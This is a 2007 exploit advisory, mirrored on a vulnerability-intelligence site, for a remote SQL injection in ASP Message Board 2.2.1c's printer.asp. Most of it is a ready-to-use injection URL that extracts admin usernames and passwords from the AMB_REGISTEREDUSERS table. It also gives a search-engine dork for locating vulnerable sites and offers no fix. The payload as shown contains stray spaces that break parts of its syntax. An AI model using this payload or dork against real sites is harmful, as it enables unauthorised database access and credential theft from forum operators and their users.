Lucene search

aspmb-sql.txt

🗓️ 06 Nov 2007 00:00:00Reported by Q7xType

packetstorm🔗 packetstormsecurity.com👁 17 Views

ASP Message Board 2.2.1c Remote Sql Injection Bug Found

`* Bug Found On : "ASP Message Board"  
*  
* Found By : Q7x  
*   
* Home : Www.Larestankids.coM ( Ashiyane2 Security Team )  
*  
* Dork : inurl:"printer.asp?forum="  
*  
* Version : 2.2.1c  
*  
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit  
*  
* Exploit : Admin User / Password : http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

06 Nov 2007 00:00Current

7.4High risk

Vulners AI Score7.4

asp message board" "remote sql injection" "version 2.2.1c" "admin user password" "printer.asp" "security team" "amber_registeredusers" "vulnerability